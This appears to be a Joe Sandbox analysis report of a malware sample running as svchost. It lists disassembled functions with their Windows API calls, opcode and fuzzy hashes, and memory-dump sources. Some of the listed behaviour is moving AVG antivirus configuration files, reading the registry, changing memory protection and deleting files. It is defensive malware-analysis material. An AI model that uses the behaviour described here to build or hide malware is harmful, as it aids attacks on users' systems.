                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1233776721-0
                                                                                                                                                                                                                • Opcode ID: 955f36dae0a0f26872d46a4af85c0d707253eb553012cf36fefd35877766f0df
                                                                                                                                                                                                                • Instruction ID: 81821e7fca53d0866ce6cce7d55bcff53e907f3cfd17060305dea41bb677f232
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 955f36dae0a0f26872d46a4af85c0d707253eb553012cf36fefd35877766f0df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D01232A42110ABD7721B35AC0C77E7964FF8DA85B884855FB42D2240DF64D1119765
                                                                                                                                                                                                                Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFolderMovePath
                                                                                                                                                                                                                • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                                • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                                Function 02BD4980 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7742FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3228293703-0
                                                                                                                                                                                                                • Opcode ID: 381911d87b1bad2b66bac3061c0add07fd12278652e5c941723e37a791ca20a2
                                                                                                                                                                                                                • Instruction ID: 20e8fed7e2a8feb5a00b5e22634d69f215216d3b2d0eb8a7bc0a3b9afb40e912
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 381911d87b1bad2b66bac3061c0add07fd12278652e5c941723e37a791ca20a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8211F1B1D01219AFCB10CFAAD8849EFFBFCFF98244F50815AEA05A7100D7745A55CBA0
                                                                                                                                                                                                                Function 02BB7620 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02BD5632,00004D42), ref: 02BB7638
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,?,02BD5632,00004D42), ref: 02BB7647
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BD5632,0000000E,00004D42,00000000,?,?,02BD5632,00004D42), ref: 02BB7659
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,?,02BD5632,00004D42), ref: 02BB7669
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3342219707-0
                                                                                                                                                                                                                • Opcode ID: 9aa913e60c9d774cff1d38b54beb5a84ed110bfd4202fa2b6fdace21f3db145f
                                                                                                                                                                                                                • Instruction ID: 1cb04472c9af727bd6ec84cec600246cc6a1d9fdf0e7376efa6bf6ace7517604
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa913e60c9d774cff1d38b54beb5a84ed110bfd4202fa2b6fdace21f3db145f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F06D71641208BFE7208F65DC89FFF7AACEB89780F504115FA01DA180DBB09A50C7B8
                                                                                                                                                                                                                Function 02BC77C0 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC6CA0,00000000,00000000,00000000), ref: 02BC77D4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC77EC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC77FD
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 02BC7805
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4233414108-0
                                                                                                                                                                                                                • Opcode ID: c60d6498b46969b7713a6f2b8ea10fa9cd76efd13c0da95f6c9c50a74e8a6be3
                                                                                                                                                                                                                • Instruction ID: b6bc05bca25ebb2997f7e285991f76373217761a560e52b90375c0c492fe58e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c60d6498b46969b7713a6f2b8ea10fa9cd76efd13c0da95f6c9c50a74e8a6be3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79E06530A85314B7F7714791DD0EF5E7AACDB00B45F700148FB00A60C0DBA06600D7A5
                                                                                                                                                                                                                Function 02BC41B0 Relevance: 6.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                                • Instruction ID: c121b3c2c30e2091ef8fb5d10c05e767b97d1b8314dd3e044456e777fc6c2387
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2D05261A82210A2DAB027B66C0CF1B6E2CEB90A92F924804BA45A3580CA2080608AB0
                                                                                                                                                                                                                Function 02BC4A30 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,75570F10,00000000,02BCA2D3), ref: 02BC4A88
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC4A8B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC4A98
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC4A9B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 789118668-0
                                                                                                                                                                                                                • Opcode ID: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                                • Instruction ID: dc1f79fdc7b93d95cfd731e107797dc6260a562fe6f539b83dde8d70533225b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D014771B861401ADB244A78697077BABBEDF82790B6D02DDF865C7288E721CD009758
                                                                                                                                                                                                                Function 02BD8CB0 Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02BD9223), ref: 02BD8CEF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                • Opcode ID: 06e7347244128f62f97098b31e928b3392d2c5da5d2665100dc1039c78ab1d26
                                                                                                                                                                                                                • Instruction ID: 9ae62e70f1d96539db6dbaf06b6005617eb0dd15cec509bce24578656540bee0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06e7347244128f62f97098b31e928b3392d2c5da5d2665100dc1039c78ab1d26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E11E672A017485BD7309E6DA8C47AAFBECEB4426AF6009FFEA49C3680D37198518750
                                                                                                                                                                                                                Function 02BC4170 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 983300431-0
                                                                                                                                                                                                                • Opcode ID: 3bbb2118801bd1de9399a137bd1631641f76dad1d1db4642feedda54b91ed71b
                                                                                                                                                                                                                • Instruction ID: 6e2268bf3aeaa9fddc85852f36ec177d76c289c16786da52523eb03415f040c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bbb2118801bd1de9399a137bd1631641f76dad1d1db4642feedda54b91ed71b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E0C277B8251166DA61112A7C18B9B2A2DDFC1671F260268FB45E3280DB20C94A46B0
                                                                                                                                                                                                                Function 02BCA4F0 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1494777729-0
                                                                                                                                                                                                                • Opcode ID: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                                • Instruction ID: a7ff049d6ebf42c13f048d6cd854432958bef7bc363130dfe03e01b7a327e0cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E065B6E406089FCF10DFD8D84599DB778FB48320F008649FA14A7240C774A920CB60
                                                                                                                                                                                                                Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID: v-@
                                                                                                                                                                                                                • API String ID: 3664257935-4190885519
                                                                                                                                                                                                                • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                                Function 02BD7490 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: bad pack level
                                                                                                                                                                                                                • API String ID: 2221118986-4081416248
                                                                                                                                                                                                                • Opcode ID: dd076006cd378057dfc80a345883009e6782fb86c1f22eaf4c17d53082dad67e
                                                                                                                                                                                                                • Instruction ID: fc85d1f1134f9f9fb945dcaa96aac828c6c35db70eec40dacbc31e746d46d09b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd076006cd378057dfc80a345883009e6782fb86c1f22eaf4c17d53082dad67e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 593182F6A00B148AD3209FB9D4805E7F7E6FF46314740497EE1AE96250DB78A085DF53
                                                                                                                                                                                                                Function 02BD7770 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,02BD757C), ref: 02BD77BF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: more < 2
                                                                                                                                                                                                                • API String ID: 3510742995-2484782096
                                                                                                                                                                                                                • Opcode ID: 7a25556c5d0b048cb7b3287275cec18ca0139c34415acfdfb5b24d286f409378
                                                                                                                                                                                                                • Instruction ID: 06a272928c6ce8f14526149c40adac8c164d62594777ed625e4a527c53e39a60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a25556c5d0b048cb7b3287275cec18ca0139c34415acfdfb5b24d286f409378
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74314BB1650A008BD7249BB9C4407E7F3A2FF42224F144ABDD0AB92294FB797485DE43
                                                                                                                                                                                                                Function 02BD8ED0 Relevance: 3.1, APIs: 2, Instructions: 66fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,00000068,?,02BD910E,00000068,00000000,00000000,00000000,00000011), ref: 02BD8EF6
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,02BD910E,00000068,00000000,00000000,00000000,00000011), ref: 02BD8F2C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileReadmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1163090680-0
                                                                                                                                                                                                                • Opcode ID: 85aab8101f215a943915d93b75dbc23f5ebb115a83f2c7596a1dd85b0b03c687
                                                                                                                                                                                                                • Instruction ID: a4aa3e402e23b5ca5b633cccfab05cda0e23d6fe021fb85779b82671bc55d547
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85aab8101f215a943915d93b75dbc23f5ebb115a83f2c7596a1dd85b0b03c687
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 451121B67007045FD724DA6AD880AABB7FAEFD4315715896EE686C7A00E731E8058B60
                                                                                                                                                                                                                Function 02BB79C0 Relevance: 3.0, APIs: 2, Instructions: 9fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,02BC8ECD,?,?,?,?,?,?), ref: 02BB79C8
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79CF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$AttributesDelete
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2910425767-0
                                                                                                                                                                                                                • Opcode ID: 6ac088976d66a1b3aaeba175c882dfb5d7c6b4761e6b0a3763bae4ea8d39448a
                                                                                                                                                                                                                • Instruction ID: dafac67188d832481488c990681432fb7e73930ed27f07dc54bf6446c2607f33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ac088976d66a1b3aaeba175c882dfb5d7c6b4761e6b0a3763bae4ea8d39448a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44B09232C438216B8E635774680C8AE7A2CAF8A7413800A40BA82E2000EF1485128BE5
                                                                                                                                                                                                                Function 02BD8BC0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3b2223e06610dd92b760774017f85afe6ee4ce0c0506c800c61a692713d7283d
                                                                                                                                                                                                                • Instruction ID: 88e4326402644c69d7fe2b7156497e403795455bb7ce6563057b069e4094191d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2223e06610dd92b760774017f85afe6ee4ce0c0506c800c61a692713d7283d
